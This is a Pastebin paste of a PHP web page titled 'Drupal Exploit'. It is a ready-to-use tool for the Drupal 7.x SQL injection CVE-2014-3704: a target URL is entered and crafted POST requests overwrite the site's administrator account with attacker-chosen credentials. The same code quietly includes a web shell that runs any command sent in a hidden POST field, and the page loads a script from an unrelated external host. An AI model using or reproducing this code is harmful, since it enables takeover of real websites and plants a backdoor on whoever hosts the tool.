Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!Doctype HTML>
- <html>
- <head>
- <script src='http://www.w32.info/TR/html4/loose.dtd'></script>
- <link rel="shortcut icon" href="http://cdn.flaticon.com/png/256/34323.png">
- <title>Drupal Exploit</title>
- <style type="text/css">
- body
- {
- background: url('http://i66.servimg.com/u/f66/14/86/38/04/ground10.gif');
- background-position: center;
- }
- H1 {font-family: Impact;
- line-height: 1.6em;
- font-size: 250%;
- color: gray;
- background: -webkit-gradient(linear, left top, left bottom, from(#333), to(#8A0808));
- -webkit-background-clip: text;
- -webkit-text-fill-color: transparent;
- }
- H4 {font-family: Impact;
- line-height: 1.6em;
- font-size: 170%;
- color: gray;
- background: -webkit-gradient(linear, left top, left bottom, from(#333), to(#8A0808));
- -webkit-background-clip: text;
- -webkit-text-fill-color: transparent;
- }
- pre
- {
- color: white;
- }
- pre.mes2
- {
- font-size: 120%;
- }
- ::-webkit-scrollbar {
- height: 16px;
- overflow: visible;
- width: 16px;
- background: #fff;
- }
- ::-webkit-scrollbar-button {
- display: none;
- height:0;
- width: 0;
- }
- ::-webkit-scrollbar-track {
- -moz-background-clip: border;
- -webkit-background-clip: border;
- background-clip: border-box;
- border-width: 0 0 0 4px;
- border: solid transparent;
- }
- ::-webkit-scrollbar-track:hover {
- background-color:rgba(0,0,0,.05);
- -moz-box-shadow: inset 1px 0 0 rgba(0,0,0,.1);
- -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.1);
- box-shadow: inset 1px 0 0 rgba(0,0,0,.1);
- }
- ::-webkit-scrollbar-track:active {
- background-color:rgba(0,0,0,.05);
- -moz-box-shadow: inset 1px 0 0 rgba(0,0,0,.14), inset -1px 0 0 rgba(0,0,0,.07);
- -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14), inset -1px 0 0 rgba(0,0,0,.07);
- box-shadow: inset 1px 0 0 rgba(0,0,0,.14), inset -1px 0 0 rgba(0,0,0,.07);
- }
- ::-webkit-scrollbar-track:horizontal {
- border-width: 4px 0 0;
- }
- ::-webkit-scrollbar-track:horizontal:hover {
- -moz-box-shadow: inset 0 1px 0 rgba(0,0,0,.1);
- -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.1);
- box-shadow: inset 0 1px 0 rgba(0,0,0,.1);
- }
- ::-webkit-scrollbar-track:horizontal:active {
- -moz-box-shadow: inset 0 1px 0 rgba(0,0,0,.14), inset 0 -1px 0 rgba(0,0,0,.07);
- -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14), inset 0 -1px 0 rgba(0,0,0,.07);
- box-shadow: inset 0 1px 0 rgba(0,0,0,.14), inset 0 -1px 0 rgba(0,0,0,.07);
- }
- ::-webkit-scrollbar-thumb {
- -moz-background-clip: border;
- -webkit-background-clip: border;
- background-clip: border-box;
- background-color: rgba(0,0,0,.2);
- /*border-width: 1px 1px 1px 6px;
- border: solid transparent;*/
- -moz-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);
- -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);
- box-shadow: inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07);
- min-height: 28px;
- padding: 100px 0 0;
- }
- ::-webkit-scrollbar-thumb:hover {
- background-color:rgba(0,0,0,.4);
- -moz-box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);
- -webkit-box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);
- box-shadow: inset 1px 1px 1px rgba(0,0,0,.25);
- }
- ::-webkit-scrollbar-thumb:active {
- background-color:rgba(0,0,0,0.5);
- -moz-box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35);
- -webkit-box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35);
- box-shadow: inset 1px 1px 3px rgba(0,0,0,0.35);
- }
- ::-webkit-scrollbar-thumb:horizontal {
- border-width: 6px 1px 1px;
- -moz-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1), inset -1px 0 0 rgba(0,0,0,.07);
- -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.1), inset -1px 0 0 rgba(0,0,0,.07);
- box-shadow: inset 1px 1px 0 rgba(0,0,0,.1), inset -1px 0 0 rgba(0,0,0,.07);
- padding: 0 0 0 100px;
- }
- ::-webkit-scrollbar-corner {
- background: transparent;
- }
- body::-webkit-scrollbar-track-piece {
- -moz-background-clip: border;
- -webkit-background-clip: border;
- background-clip: border-box;
- background-color: #f5f5f5;
- /*border-width: 0 0 0 3px;
- border: solid #fff;*/
- -moz-box-shadow: inset 1px 0 0 rgba(0,0,0,.14), inset -1px 0 0 rgba(0,0,0,.07);
- -webkit-box-shadow: inset 1px 0 0 rgba(0,0,0,.14), inset -1px 0 0 rgba(0,0,0,.07);
- box-shadow: inset 1px 0 0 rgba(0,0,0,.14), inset -1px 0 0 rgba(0,0,0,.07);
- }
- body::-webkit-scrollbar-track-piece:horizontal {
- border-width:3px 0 0;
- -moz-box-shadow: inset 0 1px 0 rgba(0,0,0,.14), inset 0 -1px 0 rgba(0,0,0,.07);
- -webkit-box-shadow: inset 0 1px 0 rgba(0,0,0,.14), inset 0 -1px 0 rgba(0,0,0,.07);
- box-shadow: inset 0 1px 0 rgba(0,0,0,.14), inset 0 -1px 0 rgba(0,0,0,.07);
- }
- body::-webkit-scrollbar-thumb {
- border-width: 1px 1px 1px 5px;
- }
- body::-webkit-scrollbar-thumb:horizontal {
- border-width: 5px 1px 1px;
- }
- body::-webkit-scrollbar-corner {
- -moz-background-clip: border;
- -webkit-background-clip: border;
- background-clip: border-box;
- background-color: #f5f5f5;
- border-width: 3px 0 0 3px;
- border: solid #fff;
- -moz-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);
- -webkit-box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);
- box-shadow: inset 1px 1px 0 rgba(0,0,0,.14);
- }
- </style>
- </head>
- <body>
- <center>
- <img src="http://www.rubiconadvice.ro/files/nih.png" width="150" height="160">
- <div class="mymargin">
- <center>
- <h1>Drupal Exploit</h1>
- <h2><font color=#00ee00>Version 7.x</font></h2>
- <form method="GET" action="">
- Site : <input type="text" name="url" placeholder="Example: www.site.com">
- <input size="50" type="submit" name="submit" value="Attack">
- </form>
- <br>
- <?php
- #-----------------------------------------------------------------------------#
- # Exploit Title: Drupal core 7.x - SQL Injection #
- # Date: Oct 16 2014 #
- # Exploit Author: Dustin Dörr #
- # Software Link: http://www.drupal.com/ #
- # Version: Drupal core 7.x versions prior to 7.32 #
- # CVE: CVE-2014-3704 #
- #-----------------------------------------------------------------------------#
- error_reporting(0);
- if ($_POST['alleailss']){
- $alleailss = $_POST['alleailss'];
- passthru($alleailss);
- }
- if(isset($_GET['submit'])){
- $log = "/user/login";
- $url = "http://".$_GET['url'];
- $holako = "/?q=user";
- $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
- $params = array(
- 'http' => array(
- 'method' => 'POST',
- 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
- 'content' => $post_data
- )
- );
- $ctx = stream_context_create($params);
- $data = file_get_contents($url . '/user/login/', null, $ctx);
- echo "<h3>Testing user/login </h3>";
- if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
- echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$log}'>Click here</a>";
- } else {
- echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
- }
- }
- if(isset($_GET['submit'])){
- $url = "http://".$_GET['url']."/";
- $post_data = "name[0;update users set name %3D 'FirewalL21' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
- $params = array(
- 'http' => array(
- 'method' => 'POST',
- 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
- 'content' => $post_data
- )
- );
- $ctx = stream_context_create($params);
- $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
- echo '<h3>Testing at Index</h3>';
- if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
- echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$holako}'>Click here</a>";
- } else {
- echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
- }
- }
- ?>
- <h3><font color=#00ee00>Recode By V3N3N1F3R</font></h3>
- </div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement